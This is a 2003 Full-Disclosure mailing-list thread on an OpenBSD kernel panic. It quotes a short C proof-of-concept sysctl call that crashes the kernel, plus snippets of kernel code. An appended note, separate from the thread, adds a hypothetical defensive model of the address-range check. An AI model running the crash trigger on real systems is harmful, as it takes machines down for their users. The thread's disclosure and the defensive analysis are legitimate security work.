Message-ID: <Pine.GSO.4.44.0311201652010.15389-100000@sodom.uberhax0r.net>
From: noir at uberhax0r.net (noir@...rhax0r.net)
Subject: OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0
i can confirm this SECURITY vulnerability on all openbsd 3.x.
so apparently searching for "XXX" and/or "FIXME" strings in obsd
kernel is a guaranteed way to locate a ring 0 vulnerability ...
nice, real nice ;P
some examples:
    char buf[128], *bufp; /* FIXME */
    int len = sh.s_size, path_index, entry_len;
    /* DPRINTF(("COFF shlib size %d offset %d\n",
        sh.s_size, sh.s_scnptr)); */
    error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t) buf,
        len, sh.s_scnptr,
    ...

/*
 * vslock: wire user memory for I/O
 *
 * - called from physio and sys___sysctl
 * - XXXCDC: consider nuking this (or making it a macro?)
 */
void
uvm_vsunlock(p, addr, len)
    struct proc *p;
    caddr_t addr;
    size_t len;
{
    uvm_fault_unwire(&p->p_vmspace->vm_map, trunc_page((vaddr_t)addr),
        round_page((vaddr_t)addr + len));
}
grep -rn or cscope is your friend ;)
On Wed, 19 Nov 2003 crispin@...unix.com wrote:
>
> ppl think "hey, local DoS sucks", therefore they are.
> i think "hey, obsd sucks", therefore i am.
>
>
> #include <stdio.h>
> #include <sys/param.h>
> #include <sys/sysctl.h>
>
> int main ()
> {
> unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;
>
> return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
> }
>
> it's wide, it's opened, it's surely obsd!
>
> --
> Crispin Coward, Ph.D. http://immunix.com/~crispin/
> Chief Scientist, Immunix http://immunix.com
> http://www.immunix.com/tosell/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
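Added example, not part of this thread and not OpenBSD's code or its eventual fix: the quoted PoC hands sysctl an address of -4096 + 1, i.e. inside the last page of a 32-bit address space, and the quoted vsunlock code computes round_page((vaddr_t)addr + len) in that same width. My reading is that the page rounding wraps to 0, so the wiring routine is handed an end below its start. The block below models the defensive version of that step: the user-supplied (addr, len) pair is treated as untrusted, the page range is computed in 64-bit arithmetic so nothing can wrap silently, and any range that wraps or leaves user space is rejected with EFAULT before anything is wired. All names and constants here (vaddr_hyp_t, PAGE_SIZE_HYP, VM_MAXUSER_ADDRESS_HYP, user_page_range, wire_user_range) are hypothetical; the user/kernel split value is made up for illustration.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Illustrative only: a 32-bit address space with an assumed user/kernel split.
 * VM_MAXUSER_ADDRESS_HYP is a made-up value, not OpenBSD's real constant.
 */
typedef uint32_t vaddr_hyp_t;
#define PAGE_SIZE_HYP           4096u
#define PAGE_MASK_HYP           ((uint64_t)(PAGE_SIZE_HYP - 1))
#define VM_MAXUSER_ADDRESS_HYP  ((uint64_t)0xbfc00000u)

/* Page rounding done in 64-bit so that a value near 2^32 cannot wrap. */
static uint64_t trunc_page64(uint64_t va) { return va & ~PAGE_MASK_HYP; }
static uint64_t round_page64(uint64_t va) { return (va + PAGE_MASK_HYP) & ~PAGE_MASK_HYP; }

/*
 * Turn a user-supplied (addr, len) pair into a page-aligned [start, end) range.
 * Returns 0 on success, EFAULT if the range wraps or leaves user space.
 * The wrap check matters: with 32-bit arithmetic, round_page(addr + len) for
 * an addr in the last page of the address space becomes 0, which is below
 * trunc_page(addr), so a wiring routine would be handed start > end.
 */
int user_page_range(vaddr_hyp_t addr, size_t len,
                    vaddr_hyp_t *start, vaddr_hyp_t *end)
{
    uint64_t s, e;

    /* An absurd length could overflow even 64-bit math; reject it early. */
    if (len > VM_MAXUSER_ADDRESS_HYP)
        return EFAULT;

    s = trunc_page64((uint64_t)addr);
    e = round_page64((uint64_t)addr + (uint64_t)len);

    /* e >= addr always holds here, so this single test also rejects a
     * start address in kernel space as well as any wrapped end. */
    if (e > VM_MAXUSER_ADDRESS_HYP)
        return EFAULT;

    *start = (vaddr_hyp_t)s;
    *end   = (vaddr_hyp_t)e;
    return 0;
}

/*
 * Stand-in for a checked vslock(): returns the number of pages that would be
 * wired, or a negative errno. A real kernel would call its fault-wire routine
 * on [start, end) at the point where this function returns a count.
 */
long wire_user_range(vaddr_hyp_t addr, size_t len)
{
    vaddr_hyp_t start, end;
    int err = user_page_range(addr, len, &start, &end);

    if (err != 0)
        return -(long)err;
    return (long)((end - start) / PAGE_SIZE_HYP);
}

int main(void)
{
    /* Constructed inputs; the second mirrors the PoC's addr = -4096 + 1 with a zero length. */
    struct { vaddr_hyp_t addr; size_t len; } cases[] = {
        { 0x1234u, 100 },
        { 0xfffff001u, 0 },
        { 0xbfbffff0u, 32 },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("addr=0x%08x len=%zu -> %ld\n",
               cases[i].addr, cases[i].len,
               wire_user_range(cases[i].addr, cases[i].len));
    return 0;
}
```

The single comparison against the top of user space is enough because the end is computed in a width that cannot wrap and is never below the start; in a real kernel the same check belongs where the user pointer first enters (the sysctl handler or vslock itself), not only in the unwire path.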